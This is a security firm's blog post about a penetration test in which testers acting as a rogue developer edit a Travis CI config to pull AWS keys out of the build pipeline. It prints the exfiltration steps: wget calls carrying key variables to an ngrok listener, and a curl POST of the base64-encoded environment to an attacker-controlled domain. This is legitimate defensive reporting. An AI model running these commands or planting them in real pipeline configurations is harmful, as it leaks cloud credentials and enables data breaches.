Alleen beschikbaar in het Engels
Hacking Jenkins to prevent a cloud data breach
Blog post 3 February 2021 by Ricardo Sanchez, Senior Security Specialist at Secura
As security experts, we have performed a lot of cloud
assessments in recent years, while the total industry is growing up.
Sometimes we get these great questions from our clients, that would be
lovely to share. One very interesting security assessment came from one
simple question: “What is the worst thing that can happen if the laptop
of a cloud developer is compromised?”
This is an understandable concern as massive cloud data breaches have recently occurred. Just to name a few as example: Capitol One lost + 100 million records in the US and + 6 million in Canada due to a server-side request forgery vulnerability [1], Marriot/Starwood over 500 million client records on a 4 year breach [2], Facebook/Cultura Colectiva 540 million records due to an AWS cloud misconfiguration [3] and River City media 1.34 billion records in an accidental data leak [4]. That is your worst nightmare for a cloud developer and possibly not so farfetched.
The anonymized scenario we assessed, had the following assumptions:
- The developer had no access to the AWS keys (and was not supposed to)
- To deploy cloud infrastructure CICD was used.
- The keys were saved in the CICD, where the developer had no access to the environment.
- The CICD process was monitored to prevent rogue or malicious deployments to the cloud.
After a joint threat modelling session
we discovered interesting attack paths and we decided to extract the
AWS keys from the CICD platform and bypass all security monitoring. And
we did so, successfully.
In general the process of deployment infrastructure is:
- The code is written
- The code is pushed to github repository
- Once pushed to github, travis will process it automatically
- Travis runs a test on the CI
- The infrastructure is deployed to the cloud
There are several “build systems” that exist today and each of them feature similar configuration options:
- Jenkins
- Travis CI
- Azure Pipelines
- AWS CodeBuild
In this particular example, Travis will be used as Travis CI is widely used and free.
Travis CI uses yaml files for deployment. In particular it uses the file .travis.yml. Since this particular file was under our control as “rogue developers” (the scenario that was defined by our client) we were able to modify it and push it to github. Once pushed to github travis will process it automatically.
Our first idea was to print the key variables and see them in the
console. Unfortunately, the travis console was not accessible to us.
Therefore, we were not able to see the output of the print statements.
To extract the interesting key variables such as $AWS_ACCESS_KEY_ID,
$aws_secret_key and $aws_key we did the following:
- Start a listener (like ngrok)
- Commit a modified `.travis.yml` file to the repository with the following code:
after_success:
- echo $AWS_ACCESS_KEY_ID
- wget http://<NGROK URL>/$(echo $AWS_ACCESS_KEY_ID)
- wget http://<NGROK URL>/$(echo $aws_secret_key)
- wget http://<NGROK URL>/$(echo $aws_key)
Alternatively, it was possible to pull the complete environment with:
- ENV_SEND=`env | base64`
- curl –X POST –k https:// domain-in-control-of-an-attacker.com/ --data “$ENV_SEND”
In the video below the full process can be observed:
About the Team
The worst case scenario if the laptop of a cloud developer is compromised was now answered with the potential impact to be next in the Cloud Data Breach “Hall of Fame”. Together with this client we also aligned to implement measures to prevent this from happening, which includes cloud services as outlined below: 1, 2 and 3.
This investigation was executed by our Secura Cloud experts: Roy Stultiens and Ricardo Sanchez. We would love to help you out to gain more insight Into Your Cloud Security.
We can help and offer several cloud services such as:
- Threat modeling
- Cloud security training
- Cloud crystal box assessment
- Cloud hacking training course
- Attack and Penetration tests
- Vulnerability management.
Ricardo
is one of the cloud experts of Secura with a strong drive to always
improve himself. He has a MsC in Cyber Security and enjoys completing
several certifications a year, which leads to the following impressive
list: OSCP, CISSP, SANS 588 (Cloud Penetration testing), SANS Manager
516 (Managing Security Vulnerabilities: Enterprise and Cloud), CCSK, AWS
Certified Solutions Architect and Security Specialty, Azure Certified
Security Engineer, Metasploit Pro Certified Specialist, Nexpose Advanced
Administrator (NACA), Certified Ethical Hacker (CEH), eCCPT, eWPT,
InsightIDR Certified Specialist, Network Assault, CompTIA Network and
Security + Certifications. As well as a hacker badge in hack the box.
His dog Taco is often by his side and a valued team member! Are you
interested to boost your learning path too and become one of our ethical
hackers? Join Secura!